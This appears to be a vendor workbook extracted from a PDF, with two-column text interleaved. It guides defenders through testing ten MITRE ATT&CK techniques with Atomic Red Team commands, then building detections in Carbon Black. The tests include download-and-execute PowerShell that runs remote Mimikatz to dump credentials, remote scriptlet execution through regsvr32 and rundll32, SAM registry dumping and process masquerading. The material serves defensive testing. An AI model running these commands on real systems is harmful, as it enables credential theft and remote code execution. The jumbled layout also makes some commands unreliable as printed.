MITRE ATT&CK WORKBOOK Table of Contents
About This Workbook ...... 4.
Getting Started with ATT&CK ...... 7
Workbook TIDs ...... 8 .
MITRE TID Workbook ...... 9
T1086 PowerShell ...... 9
T1064 Scripting ...... 12
T1117 Regsvr32 ...... 16
T1090 Connection Proxy ...... 17.
T1193 Spear Phishing Attachment ...... 20
T1036 Masquerading ...... 22
T1003 Credential Dumping ...... 24.
T1060 Registry Run Keys / Start Folder ...... 27
T1085 Rundll32 ...... 29
T1035 Service Execution ...... 31
VMware Carbon Black Cloud Overview ...... 34
2 3 About This Workbook
What is MITRE ATT&CK?
MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on With the creation of ATT&CK, MITRE is fulfilling its mission to solve problems for a safer world — by bringing real-world observations . The ATT&CK knowledge base is used as a foundation for the development of communities together to develop more effective cybersecurity . ATT&CK is open and available to any person or specific threat models and methodologies in the private sector, in government, and in the cybersecurity organization to use at no charge . https://attack.mitre.org product and service community .
INITIAL PRIVILEGE DEFENSE CREDENTIAL LATERAL COMMAND EXECUTION PERSISTENCE DISCOVERY COLLECTION EXFILTRATION IMPACT ACCESS ESCALATION EVASION ACCESS MOVEMENT AND CONTROL
Drive-by .bash_profile Access Token Access Token Account Commonly Used Automated AppleScript Account Discovery AppleScript Audio Capture Data Destruction Compromise and .bashrc Manipulation Manipulation Manipulation Port Exfiltration Application Communication Exploit Public- Accessibility Accessibility Application Automated Data Encrypted CMSTP BITS Jobs Bash History Deployment Through Data Compressed Facing Application Features Features Window Discovery Collection for Impact Software Removable Media Distributed External Remote Command-Line Account Browser Bookmark AppCerts DLLs Binary Padding Brute Force Component Clipboard Data Connection Proxy Data Encrypted Defacement Services Interface Manipulation Discovery Object Model Custom Command Hardware Compiled HTML Bypass User Domain Trust Exploitation of Data Transfer AppCert DLLs AppInit DLLs Credential Dumping Data Staged and Control Disk Content Wipe Additions File Account Control Discovery Remote Services Size Limits Protocol
Replication Data from Custom Exfiltration Application File and Directory Through Control Panel Items AppInit DLLs CMSTP Credentials in Files Logon Scripts Information Cryptographic Over Alternative Disk Structure Wipe Shimming Discovery Removable Media Repositories Protocol Protocol
Exfiltration Over Spear Phishing Dynamic Data Application Bypass User Clear Command Credentials in Network Service Data from Local Endpoint Denial Pass the Hash Data Encoding Command and Attachment Exchange Shimming Account Control History Registry Scanning System of Service Control Channel Exfiltration Over Execution Through Authentication DLL Search Order Exploitation for Network Share Data from Network Firmware Spearphishing Link Code Signing Pass the Ticket Data Obfuscation Other Network API Package Hijcking Credential Access Discovery Shared Drive Corruption Medium Exfiltration Over Spear Phishing via Execution Through Compile After Forced Remote Desktop Data from Inhibit System BITS Jobs Dylib Hijacking Network Sniffing Domain Fronting Other Physical Service Module Load Delivery Authentication Protocol Removable Media Recovery Medium Supply Chain Exploitation for Exploitation for Compiled HTML Password Policy Domain Generation Network Denial Bootkit Hooking Remote File Copy Email Collection Scheduled Transfer Compromise Client Execution Privilege Escalation File Discovery Algorithms of Service
4 5 This workbook is intended to serve as a starting point for mapping to the MITRE ATT&CK to enable the Cyber Defender community to understand adversaries and improve your organization’s security posture . Through Getting Started with ATT&CK this guide you will notice specific reference to the VMware Carbon Black toolset but some capabilities may be available with other endpoint security tools . .
We would like to credit and thank Red Canary for their excellent work on curating content specifically on This workbook will break down each TID using 3 steps: MITRE ATT&CK . Referenced throughout to make this guide possible: Step 1: Test Technique Red Canary’s Threat Detection Report utilized to pinpoint the top 10 TID’s by prevalence . For each of the TIDs, we will leverage Red Canary’s Atomic Tests to quickly validate coverage. The Atomic Red Team Full Report Here: https://redcanary.com/resources/guides/threat-detection-report was developed by Red Canary to create an open source library of simple tests that every security team can execute to test their environmental controls. Tests are focused, have few dependencies, and are defined in a structured Red Canary’s ATOMIC Tests utilized for quick and easy tests to verify TID coverage . format that can be used by automation frameworks. More on Atomic Red Team here. More on the ATOMIC Red Team here: https://redcanary.com/atomic-red-team Step 2: Validate Coverage, Identify Gaps Be sure to check out their ATOMIC Friday webinars for more breakdowns on ATT&CK stages and testing techniques! Sign up here: https://redcanary.com/blog/atomic-friday-community-discussions ATT&CK was intended to highlight visibility gaps in your organization. Did you alert on the test? Do you have telemetry to build alerts around the specified technique? Re-execute the test once alerts are built.
TEST TECHNIQUE Icons Used in This Workbook YES
Did you alert on it?
NO
YES NO BUILD Do you have Telemetry? ACQUIRE DETECTION VISIBILITY
Step 3: Identify and Implement Mitigations REMEMBER WARNING TECHNICAL STUFF TIP Can you block it? Some points bear Watch out! This icon indicates technical If you see a Tip icon, While these techniques are commonly utilized by adversaries, they may also be necessary for legitimate day- repeating, and others bear This information tells you information that’s most pay attention — you’re to-day administration . This step will help identify ways to reduce the attack surface through a combination of remembering. When you to steer clear of things that interesting to administrators about to find out how to enhanced visibility and prevention . see this icon, take special may leave you vulnerable, and incident responders. save some aggravation . note of what you’re about cost you big bucks, and time. When implementing prevention on TID’s ensure you can identify potential false to read. suck your time, or be positives that may occur to eliminate organizational friction. MITRE built the ATT&CK bad practices. framework as a detection resource. Prevention does not always match one-to-one.
BONUS: Can you interrogate your environment to get more information?
6 7 Workbook TIDs MITRE TID Workbook
For this workbook we are providing a starting point for working with the ATT&CK T1086 POWERSHELL Framework. To make the most of your efforts this workbook will detail the top Execution Stage. 10 TID’s as leveraged by adversaries. Why T1086 Matters: PowerShell is included in the Windows operating system and can be leveraged by The 10 TID’s as identified by Red Canary’s 2019 Threat Detection Report. administrators and adversaries alike . Administrator permissions are required to use PowerShell to connect to The full Threat Detection Report is available here. remote systems, and provides full Windows API access. PowerShell can be executed from disk or in memory which makes it easy to evade common defenses .
How PowerShell can be leveraged: • Direct execution of a local script • Encoded payloads passed via the command line T1086 T1064 T1117 • Retrieving and executing remote resources using various network protocols POWERSHELL SCRIPTING REGSVR32 • Loading PowerShell into other processes
For full description: MITRE Reference
Step 1: Test Technique T1090 T1193 T1036 T1003 T1086 Atomic Test – Mimikatz T1086 Atomic Test – BloodHound CONNECTION SPEAR PHISHING MASQUERADING CREDENTIAL Run it with command prompt. Run it with command prompt. PROXY ATTACHMENT DUMPING powershell exe. “IEX (New-Object Net . powershell exe. “IEX (New-Object Net . WebClient) .DownloadString(‘ https://raw . WebClient) .DownloadString(‘ https://raw . githubusercontent com/mattifestation/. githubusercontent com/BloodHoundAD/. T1060 PowerSploit/master/Exfiltration/ BloodHound/master/Ingestors/ T1035 Invoke-Mimikatz ps1’);. Invoke-Mimikatz SharpHound .ps1’); Invoke-BloodHound REGISTRY RUN T1085 SERVICE -DumpCreds” KEYS/START RUNDLL32 EXECUTION FOLDER What’s Gained if Successful? What’s Gained if Successful? Mimikatz is a post-exploitation tool designed to BloodHound is a post-exploitation tool designed dump passwords, hashes, PINs and Kerberos tickets to map out AD structures to identify gaps in logic from memory . If an adversary is successful they will that will allow for privilege escalation . If successful Run these tests monthly to maintain an understanding of your gaps and risks. have access to credentials to elevate privileges and/ the adversary will have a list of admin users, global Don’t wait for an adversary to find the weaknesses in your defenses. or move laterally through the network . access users, and group membership information.
For more Atomic tests: Atomic Tests
8 9 Step 2: Validate Coverage, Identify Gaps Can you block it? Yes, but it is likely that there are several applications and users within your organization that will need access to Did you alert on this test? PowerShell in order to function. In your endpoint security solution, determine how PowerShell is being utilized in your organization today:
process_name:powershell exe.
Do you have the telemetry to define an alert? 1 . What is the scope of PowerShell usage? Systems or Groups PowerShell has been seen on in the last 30 days: ▢ Process Cmdline a . Is this expected? Do any of the users stand out to you? ▢ File Modification ▢ Network Connections PowerShell is a powerful solution that can be manipulated for malicious intent . Understanding that most Endpoint security providers will protect you from malicious PowerShell usage such as: stealing Will this alert cause false positives? credentials or encrypting files,how can you start to reduce your attack surface on the #1 most Alerting on PowerShell as an application could create a lot of noise, with the alert triggered can you identify any targeted tool by adversaries? potential false positives with how the alert is designed? Of the PowerShell usage identified in the last 30 days, what behaviors are exhibited in your organization? If yes, modify your existing alert to exclude the ‘normal activity’ in your environment.
Modify a Watchlist Hit in VMware Carbon Black: Does PowerShell Communicate over the network? 1 . Click on the ReportID to view the Report details of the Watchlist . process_name:powershell exe. AND (netconn_count:[1 TO *] OR ttp:NETWORK_ACCESS OR 2 . Disable the IOC ttp:ATTEMPTED_SERVER OR ttp:ATTEMPTED_CLIENT) 3. Refine the IOC by clicking on the IOC string to search your environment over the last 30 days .
4 . Once the appropriate exclusions have been made add the new query as a Watchlist by clicking Does PowerShell Execute Code from Memory? ‘Add search to threat report’
process_name:powershell.exe AND (ttp:SUSPICIOUS_BEHAVIOR OR ttp:PACKED_CALL) Leverage the facets on the left-hand side of the Investigate page to identify anomalous activities and create alerts on anomalous activity for your organization. Focus on the smaller percentages to identify interesting activity. Does PowerShell Invoke Untrusted Processes?
Step 3: Identify and Implement Mitigations process_name:powershell.exe AND (childproc_effective_reputation:NOT_LISTED OR childproc_ effective_reputation:UNKNOWN) As Powershell is a trusted application we need to be prescriptive in reducing the attack surface that exists for this portion of the exercise we will want to baseline PowerShell usage.
Questions for Consideration: Does PowerShell Execute Fileless Scripts? • Do you currently enforce restrictions on how PowerShell can be leveraged in your organization today? • Do you have admin rights in your organization? process_name:powershell exe. AND ttp:FILELESS • Should all of these administrators have access to PowerShell?
How is PowerShell currently controlled and monitored for these power users?
10 11 Does PowerShell Inject Code or Modify the Memory of other processes? Write-Output “msgbox ‘hello’” > test vbs. .\test vbs. process_name:powershell exe. AND (ttp:INJECT_CODE OR ttp:HAS_INJECTED_CODE OR ttp: COMPROMISED_PROCESS OR ttp:PROCESS_IMAGE_REPLACED OR ttp:MODIFY_PROCESS OR ttp:HOLLOW_PROCESS) What’s Gained if Successful? This test demonstrates an adversary’s ability to create and run a script within your environment . Adversaries can create a script and then locally append that script to a scheduled task to remain under the radar .
Refine these queries to focus the groups identified previously to understand how For more Atomic tests: Atomic Test to control their PowerShell access by blocking them with in your Policies. For the remainder of the environment try and block PowerShell outright to eliminate this vector. Step 2: Validate Coverage, Identify Gaps
MITRE also suggests restricting the execution policy to administrators to only allow In your endpoint security portal identify if you have visibility to identify the tests that were executed. signed scripts and disabling or restricting WinRM service to prevent remote execution. Did you alert on this test?
Do you have the telemetry to define an alert? ▢ Process Cmdline ▢ File Modification T1064 SCRIPTING ▢ Parent Process
Execution Stage. Will this alert cause false positives? If alerting on this script creation alone you will be prone to false positives as script creation is a common activity . Why T1064 Matters: Adversaries may use scripts to aid in operations and perform actions that would otherwise Try searching for the following to look at small example of script creation in your environment over the last 30 be manual . Scripting is useful for speeding up operational tasks and reducing the time required to gain access days: to critical resources . Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs . Common scripting languages for Windows include: VBScript and PowerShell, but could also appear in the form of filemod_name:.vbs OR filemod_name:.ps1 command-line batch scripts . What did you find? How Scripting can be leveraged: • Direct execution of local scripts The goal of analyzing T1064 is to verify visibility on script creation, opposed to alerting on this activity define a • Executing within a process query that allows you to monitor script creations over the last 30 days . • Rundll32 exe. with script host scheme Build a New Watchlist in VMware Carbon Black: • Identification and exploitation of vulnerable scripts 1. Under ENFORCE, Watchlist define a new watchlist by selecting For full description: MITRE Reference 2 . Toggle to ‘Build’ a Watchlist Step 1: Test Technique
T1064 – Write a script and detect it Run it with PowerShell.
12 13 3. Search for ‘T1064’, select desired IOC’s then add new Watchlist. Do your scripts Invoke Untrusted Processes?
filemod_name:.vbs AND (childproc_effective_reputation:NOT_LISTED OR childproc_effective_ reputation:UNKNOWN)
Do your scripts Execute Fileless Scripts?
filemod_name:.vbs AND ttp:FILELESS
Do your scripts Scrape Memory of another Process?
filemod_name:.vbs AND (ttp:RAM_SCRAPING OR ttp:READ_SECURITY_DATA) Step 3: Identify and Implement Mitigations
Can you block it? Create new Blocking Rules in VMware Carbon Black: Scripting is one of the more broad execution techniques that adversaries can leverage. Instead of blocking Based on the above queries we can now define how we can reduce our attack surface. script execution consider refining your attack surface by answering the following questions in your endpoint 1. Navigate to ENFORCE, then Policies security solution: 2. On the desired Policy modify Prevention rules by blocking the identified behaviors. • Who/what should be creating scripts?
• Can you control or audit how Administrators are creating scripts?
• If enabling controls on scripting tools can you verify potential false positives?
• Can you reduce the functionality of scripts without disrupting workflow? BONUS: Can you interrogate your environment to get more information? Scripting can be used by adversaries as a method to locally appended code to a scheduled task for persistence . As an example, review the execution of vbs scripts, VMware Carbon Black gives you granular control of locking You can use the Live Query capability on our platform to validate the scheduled tasks on a known good system, down ANY file extension. Simply repeat this process with what you are looking to address. then compare the results to look for potentially suspicious scheduled tasks across your enterprise . Do your scripts Communicate over the network?
filemod_name:.vbs AND (netconn_count:[1 TO *] OR ttp:NETWORK_ACCESS OR ttp:ATTEMPTED_ SELECT name, action, PATH, enabled, state, hidden, datetime(last_run_time, “unixepoch”, “localtime”) SERVER OR ttp:ATTEMPTED_CLIENT) AS last_run_time, datetime(next_run_time, “unixepoch”, “localtime”) AS next_run_time, last_run_ message, last_run_code FROM scheduled_tasks ORDER BY last_run_time DESC;
Do your scripts Execute Code from Memory?
filemod_name:.vbs AND (ttp:SUSPICIOUS_BEHAVIOR OR ttp:PACKED_CALL)
14 15 T1117 REGSVR32 Will this alert cause false positives?
Execution Stage . Step 3: Identify and Implement Mitigations
Why T1117 Matters: Regsvr32 exe. is a command-line program used to register and unregister object linking and Can you block it? embedding controls—including dynamic link libraries (DLLs)—on Windows systems. Regsvr32.exe can be used Yes, adversaries will continue abusing regsvr32. It is advisable to block this activity. In your endpoint security to execute arbitrary binaries and also to specifically bypass process whitelisting using functionality to load COM solution, answer the following questions: scriptlets to execute DLLs under user permissions . • By turning on regsvr32 protection, what does this block specifically?
How can Regsvr32.exe be leveraged: • If using dials, can you confirm which mode/level protects you from regsvr32 attacks? • File modification in the users profile Defining Prevention using VMware Carbon Black: • Network connections initiated by regsvr32 exe. processes • Module loads for scrobj dll. VMware Carbon Black makes it easy to understand potential impact to your environment either by simply clicking on to preview any corresponding blocks or by performing the desired query: For full description: MITRE Reference Does regsvr32 Communicate over the network?
Step 1: Test Technique process_name:regsvr32 exe. AND (netconn_count:[1 TO *] OR ttp:NETWORK_ACCESS OR T1117 Atomic Test – Regsvr32 local COM scriptlet execution ttp:ATTEMPTED_SERVER OR ttp:ATTEMPTED_CLIENT) Run it with command prompt. Does regsvr32 Invoke Untrusted Processes? regsvr32 exe. /s /u /i:https://raw .githubusercontent com/redcanaryco/atomic-red-team/master/. atomics/T1117/RegSvr32 sct. scrobj dll. process_name:regsvr32.exe AND (childproc_effective_reputation:NOT_LISTED OR childproc_ effective_reputation:UNKNOWN)
What’s gained if successful? The adversary can execute untrusted binaries in memory with trusted windows system binaries ultimately evading defenses and detections .
For more Atomic tests: Atomic Test T1090 CONNECTION PROXY Step 2: Validate Coverage, Identify Gaps Command & Control Stage. Did you alert on this test? Why T1090 Matters: A connection proxy is used to direct network traffic between systems and to act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection including HTRAN, ZXProxy, and ZXPortMap. Proxy acts as a method of masking an identity or location of the adversary .
How can Connection Proxies be used: • Internal or External Communication Do you have the telemetry to define an alert? • Injecting into trusted processes to make connections ▢ Module Loads • Routing connections through less attributable access points ▢ Binary Information For full description: MITRE Reference
16 17 Step 1: Test Technique Step 3: Identify and Implement Mitigations T1090 Atomic Test – Connection Proxy Can you block it? Run it with PowerShell. Potentially, proxies are a common method of porting traffic in many organizations. The key will be leveraging network information to understand abnormal. Set-ItemProperty -path “HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings” AutoConfigURL -Value 127.0.0.1:8080 Identify use of proxy by looking for injection into trusted processes to make t connections, routing connections through less attributable access points. Check your What’s gained if successful? enterprise proxy configuration status to ensure this has not been tampered with. Adversary will be able to redirect traffic and can intercept traffic communications.
For more Atomic tests: Atomic Test BONUS: Can you interrogate your environment to get more information?
Using Live Query or your endpoint security solution answer the following questions: Step 2: Validate Coverage, Identify Gaps • What is the current status of your enterprise proxy configuration? In your endpoint security portal identify if you have visibility to identify the tests that were executed.
Did you alert on this test? SELECT key,name,data, case data when 0 then “DISABLED” when 1 then “ENABLED” end status, datetime(mtime,”unixepoch”,”localtime”) as mtime FROM registry WHERE key like ‘HKEY_USERS\%\ Do you have the telemetry to define an alert? Software\Microsoft\Windows\CurrentVersion\Internet Settings’ and data != “” and lower(name) like ▢ Registry Modification “%proxy%” order by key; ▢ Process Injection into Trusted Processes
Will this alert cause false positives? • Can you identify network connections made by system processes in your organization? Create a File Integrity Monitoring Watchlist in VMware Carbon Black:
1. On the Investigate page, identify the modification of the Proxy registry key by querying for the following: select DISTINCT p.name, p.path, pos.remote_address, pos.remote_port from process_open_sockets pos LEFT JOIN processes p ON pos.pid = p.pid WHERE pos.remote_port != 0 AND p.name != ‘’; (regmod_name:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\ZoneMap\\ ProxyBypass) AND process_name:(powershell exe. OR cmd exe). • Can you identify all listening ports enterprise wide?
2 . Select ‘Add search to threat report’ select p.name, p.path, lp.port, lp.address, lp.protocol from listening_ports lp LEFT JOIN processes p ON lp.pid = p.pid WHERE lp.port != 0 AND p.name != ‘’; 3. Select Alert on Hit to trigger future alerts, and Select Include Historical Data to see past hits.
18 19 T1193 SPEAR PHISHING ATTACHMENT What’s Gained if Successful? An adversary can effectively evade common defenses by targeting User Error. This foothold provides initial Initial Access Stage. access for the adversary to impact the system .
For more Atomic tests: Atomic Test Why T1193 Matters: Spear phishing attachment is a specific variant of spear phishing. Spear phishing attachment is different from other forms of spear phishing in that it employs the use of malware attached to an email. All forms of spear phishing are electronically delivered, socially engineered, and targeted at a specific Step 2: Validate Coverage, Identify Gaps individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and rely upon User Execution to gain execution . Did you alert on this test?
Common Phishing Observations: • Delivery of malicious software
• Delivery of malicious documents Look for email client invoking documents and making network connections, • Delivery of URL lure in message or launching office applications that invoke command interpreters. • Request for Information/Assistance
For full description: MITRE Reference Do you have the telemetry to define an alert? ▢ File monitoring Step 1: Test Technique Will this alert cause false positives? T1193 Atomic Test – Spear Phishing Create a PS1 file with the following information:
Step 3: Identify and Implement Mitigations if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel .Application)){ return ‘Please install Microsoft Excel before running this test.’ Can you block it? } Yes, spear phishing campaigns are socially engineered to exploit human error. Through a combination of email else{ filtration and endpoint protection you will want to block this initial access point. $url = ‘https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/PhishingAt tachment .xlsm’ $fileName = ‘PhishingAttachment.xlsm’ New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ($wc.DownloadString(“$url”)) | Out-File $fileName }
Run with PowerShell:
.\testFile .ps1
Open the downloaded Excel file.
20 21 Do you have the telemetry to define an alert? T1036 MASQUERADING ▢ File Monitoring Defense Evasion Stage. ▢ Process Monitoring ▢ Binary Metadata Why T1036 Matters: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation . Masquerading is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate . Defense Evasion can be thought of as a supporting tactic . Typically Defense Evasion will be utilized in combination with another tactic to achieve a larger goal, i.e.,Masquerading combined with Scheduled Tasks to achieve and maintain persistence by blending into the environment .
Common Masquerading Observations: • Renaming or relocating files • Binary Metadata manipulation Will this alert cause false positives?
For full description: MITRE Reference Step 3: Identify and Implement Mitigations
Step 1: Test Technique Can you block it? T1036 Atomic Test – Masquerading as Windows LSASS process No, a lot of legitimate applications will be masquerading and adversaries will mask themselves to appear in an Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. expected lineage hiding suspicious command lines. Auditing binary details as well as abnormal execution paths will allow you to identify more easily masquerading techniques. In your endpoint security solution answer the Run it with command prompt. following questions:
• Which user is running cmd in the above example? cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe • Can you analyze full binary details of lsass to ensure its legitimacy? cmd.exe /c %SystemRoot%\Temp\lsass.exe whoami ping 8 8. 8. .8
For more Atomic tests: Atomic Test
Step 2: Validate Coverage, Identify Gaps
Did you alert on this test?
SANS Know Abnormal… Find Evil Threat Intelligence Feed is a great feed for alerting on Masquerading processes.
22 23 TT1003 CREDENTIAL DUMPING Step 2: Validate Coverage, Identify Gaps Did you alert on this test? Credential Access Stage.
Why T1003 Matters: Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials are leveraged by adversaries to elevate privileges and to move laterally to other targets . Note: credentials are so Monitor processes and command-line arguments for program execution that may be valuable that, sometimes, acquiring them is the entire goal of an attack. indicative of credential dumping. Remote access tools may contain built-in features or Credentials can then be used to perform Lateral Movement and access restricted information . Several of the incorporate existing tools like Mimikatz. tools mentioned in this technique may be used by both adversaries and professional security testers . Additional custom tools likely exist as well . Do you have the telemetry to define an alert? ▢ Process Cmdline Common Credential Dumping Categories: ▢ Process Monitoring • Accessing hashed credentials • Accessing credentials in plaintext Will this alert cause false positives? • Acquiring key material
For full description: MITRE Reference Step 3: Identify and Implement Mitigations
Can you block it? Step 1: Test Technique Yes, Credentials are so valuable that, sometimes, acquiring them is the entire goal of an attack. It would be imperative to restrict this activity when observed in your organization. T1003 Atomic Test – PowerShell Mimikatz T1003 Atomic Test – Registry Dump of SAM, Dumps Credentials via Powershell Creds, and Secrets by invoking a remote mimikatz script . Local SAM (SAM & System), cached credentials Run it with PowerShell. (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys . IEX (New-Object Net WebClient). . Then processed locally using https://github.com/ DownloadString(‘ https://raw . Neohapsis/creddump7 githubusercontent com/EmpireProject/. Run it with command prompt. Empire/dev/data/module_source/ credentials/Invoke-Mimikatz .ps1’); Invoke- reg save HKLM\sam sam Mimikatz -DumpCreds reg save HKLM\system system reg save HKLM\security security BONUS: Can you interrogate your environment to get more information? What’s Gained if Successful? A variety of credentials are generated and stored What’s Gained if Successful? Since credentials are a valuable asset to adversaries there are several windows based protections that are best in the Local Security Authority Subsystem Service SAM is a database file that contains local accounts practice to ensure they are in the appropriate status. Using the Live Query capability on our platform, (lsass) process in memory . If harvested the for the host, once obtained the database can be verify the following: adversary will have access to local accounts for processed to retrieve hashes for the adversary to privilege escalation . elevate privileges .
For more Atomic tests: Atomic Test
24 25 Is restricted admin mode disabled? Learn more T1060 REGISTRY RUN KEYS / START FOLDER Persistence Stage. SELECT name,type, CASE cnt WHEN 1 THEN “DISABLED” ELSE “ENABLED” END “LSA Restricted Admin Protection”, datetime(mtime,”unixepoch”,”localtime”) AS last_registry_write FROM Why T1060 Matters: Adding an entry to the “run keys” in the Registry or startup folder will cause the program (SELECT *,COUNT(*) AS cnt FROM registry WHERE Path=’HKEY_LOCAL_MACHINE\\SYSTEM\\ referenced to be executed when a user logs in . These programs will be executed under the context of the user CurrentControlSet\\Control\\LSA\\DisableRestrictedAdmin’ AND data = 0); and will have the account’s associated permissions level .
The following run keys are created by default on Windows systems:
Is Wdigest Disabled to protect pulling plaintext credentials? Learn more HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run SELECT name,type, CASE cnt WHEN 0 THEN “DISABLED” ELSE “ENABLED” END “Wdigest LSASS HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Protection”, CASE WHEN (SELECT name FROM os_version) LIKE (“%Windows 7%” OR “%Windows 2008%”) AND (SELECT hotfix_id FROM patches) != “KB2871997” THEN “TRUE” ELSE “FALSE” END “KB2871997 Needed”, DATETIME(mtime,”unixepoch”,”localtime”) AS last_registry_write FROM The following Registry keys can be used to set startup folder items for persistence: (SELECT *,COUNT(*) AS cnt FROM registry WHERE path=’HKEY_LOCAL_MACHINE\\SYSTEM\\ CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential’); HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Verify LSA protections are enabled. Learn more HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
SELECT name,type,CASE cnt WHEN 0 THEN “DISABLED” ELSE “ENABLED” END “LSM Protection”, datetime(mtime,”unixepoch”,”localtime”) AS last_registry_write FROM (SELECT *,COUNT(*) AS cnt Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain FROM registry WHERE path=’HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA\\ persistence through system reboots . Adversaries may also use Masquerading to make the Registry entries look RunAsPPL’); as if they are associated with legitimate programs .
For full description: MITRE Reference • Identify cleartext passwords exposed using unencrypted LDAP authentications. Learn more
SELECT p.name, lp.port, lp.address, p.pid FROM listening_ports as lp JOIN processes as p USING (pid) WHERE lp.port = ‘389’;
• Check for weak authentication types in your organization. Learn more
SELECT CASE COUNT(*) WHEN 0 THEN “FALSE” ELSE “TRUE” END “NTLMv2 Only Enabled” FROM registry WHERE path=’HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\ LMCompatibilityLevel’ AND data != 5;
26 27 Step 1: Test Technique Based on the results from this question, define a watchlist to monitor run key changes but excludes authorized users and processes .
T1060 Atomic Test – Reg Key Run T1060 – Reg Key RunOnce Run Key Persistence RunOnce Key Persistence (((process_cmdline:”microsoft\\windows\\currentversion\\run” OR process_cmdline:”microsoft\\ Run it with Command Prompt. Run it with command prompt. windows\\currentversion\\runonce” OR process_cmdline:”microsoft\\windows\\currentversion\\ runonceex”)) -legacy:true)
REG ADD “HKCU\SOFTWARE\Microsoft\ REG ADD HKLM\SOFTWARE\Microsoft\ Note – VMware Carbon Black can be built out for other file integrity monitoring (FIM) use cases that may be Windows\CurrentVersion\Run” /V “Atomic Windows\CurrentVersion\RunOnceEx\0001\ dictated by your auditors. Engage a VMware Carbon Black Sales Engineer for further details on how to define Red Team” /t REG_SZ /F /D “C:\Path\ Depend /v 1 /d “C:\Path\AtomicRedTeam dll”. queries for auditing. AtomicRedTeam exe”. REG DELETE HKLM\SOFTWARE\Microsoft\ BONUS: Can you interrogate your environment to get more information? REG DELETE “HKCU\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnceEx\0001\ Depend /v 1 /f Windows\CurrentVersion\Run” /V “Atomic The purpose of modifying a registry is to establish persistence in your environment. Use VMware Carbon Black’s Red Team” /f Live Query capability to validate the autoruns on a known good system, then compare the results to look for potentially suspicious tasks across your enterprise .
For more Atomic tests: Atomic Test SELECT * FROM autoexec;
Step 2: Validate Coverage, Identify Gaps
Did you alert on this test? T1085 RUNDLL32
Execution Stage. Do you have the telemetry to define an alert? ▢ Registry Monitoring Why T1085 Matters: The rundll32 exe. program can be called to execute an arbitrary binary . Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools because of whitelists ▢ File Monitoring or false positives due to Windows using rundll32 exe. for normal operations .
Will this alert cause false positives? For full description: MITRE Reference Ensure that the alert will not flag known good software, patching tools or verified users.
Step 3: Identify and Implement Mitigations Step 1: Test Technique T1085 Atomic Test – Rundll32 execute JavaScript Remote Payload with GetObject Can you block it? Run it with command prompt. Registry changes happen frequently, you need to audit the creation, and deletion of registry changes within key locations to ensure the key is not being misused. In your endpoint security solution answer the rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document. following questions: write();GetObject(“script:https://pastebin com/raw/aUF9SRPC”);. • Who can or should modify your registry? Create a File Integrity Monitoring Watchlist in VMware Carbon Black: What’s gained if successful?
28 29 Rundll32 allows for adversaries to interpret Java in memory to evade common defenses . T1035 SERVICE EXECUTION For more Atomic tests: Atomic Test Execution Stage.
Why T1035 Matters: Adversaries may execute a binary, command, or script via a method that interacts with Step 2: Validate Coverage, Identify Gaps Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service . This technique is the execution used in conjunction with New Service and Modify Did you alert on this test? Existing Service during service persistence or privilege escalation . Note: Windows 10S has protections to prevent loading unsigned binaries or launching certain executables with in the context of a system service . This may begin to limit the effectiveness of this technique but it won’t eliminate it entirely. Do you have the telemetry to define an alert? ▢ Registry Monitoring How Service Execution can be leveraged: • Start and stop services ▢ Process Cmdline • Use PsExec (or variants) to spread laterally ▢ Binary Metadata • Registry modification for service persistence Will this alert cause false positives? For full description: MITRE Reference
Step 3: Identify and Implement Mitigations Step 1: Test Technique Can you block it? Yes, the malicious usage of Rundll32 is something that should be blocked with in your organization, while the T1035 Atomic Test – Execute a Command as a Service usage of Rundll32 should be allowed. In your endpoint security solution answer the following questions: Run it with command prompt. • Can you query for all rundll32 activity in the last 30 days? • Are you able to control how rundll32 can be leveraged in your organization? • Can you analyze full binary details of rundll32 exe. to ensure its legitimacy? sc.exe create ARTService binPath= “%COMSPEC% /c powershell.exe -nop -w hidden -command New- Item -ItemType File C:\rt-marker txt”. sc exe. start ARTService sc exe. delete ARTService
What’s gained if successful? In this test we created a service that would execute an arbitrary command . This could be leveraged for execution, persistence or privilege escalation.
For more Atomic tests: Atomic Test
Step 2: Validate Coverage, Identify Gaps
Did you alert on this test?
30 31 Do you have the telemetry to define an alert? ▢ Registry Modifications ▢ Process Cmdline
Will this alert cause false positives?
Step 3: Identify and Implement Mitigations
